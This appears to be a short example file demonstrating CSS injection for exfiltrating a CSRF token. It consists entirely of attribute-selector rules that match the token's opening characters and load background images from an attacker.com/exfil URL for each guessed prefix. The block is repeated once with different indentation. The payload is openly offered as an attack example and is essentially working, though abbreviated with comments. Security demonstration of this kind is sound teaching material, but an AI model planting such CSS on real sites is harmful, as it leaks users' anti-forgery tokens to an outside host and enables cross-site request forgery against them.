d0nutptr/example_css_injection_2.css

## example_css_injection_2.css
input[name=csrf][value^=ca]{
    background-image: url(https://attacker.com/exfil/ca);
}
input[name=csrf][value^=cb]{
    background-image: url(https://attacker.com/exfil/cb);
}
/* ... */
input[name=csrf][value^=c9]{
    background-image: url(https://attacker.com/exfil/c9);
}
	input[name=csrf][value^=ca]{
	background-image: url(https://attacker.com/exfil/ca);
	}
	input[name=csrf][value^=cb]{
	background-image: url(https://attacker.com/exfil/cb);
	}
	/* ... */
	input[name=csrf][value^=c9]{
	background-image: url(https://attacker.com/exfil/c9);
	}